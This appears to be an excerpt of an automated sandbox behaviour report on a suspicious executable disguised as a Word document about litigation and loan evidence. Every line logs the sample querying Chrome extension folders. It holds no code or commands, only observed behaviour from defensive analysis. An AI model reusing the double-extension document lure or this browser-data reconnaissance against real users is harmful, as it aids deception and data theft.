Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\is VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lo VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\no VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pa VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ro VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\si VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sw VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ta VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\te VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\th VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\tr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\uk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ur VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\vi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_CN VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_HK VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_TW VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\el VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\es_419 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\et VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fil VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\hu VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ko VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\lv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\pt_PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images VolumeInformation	Jump to behavior
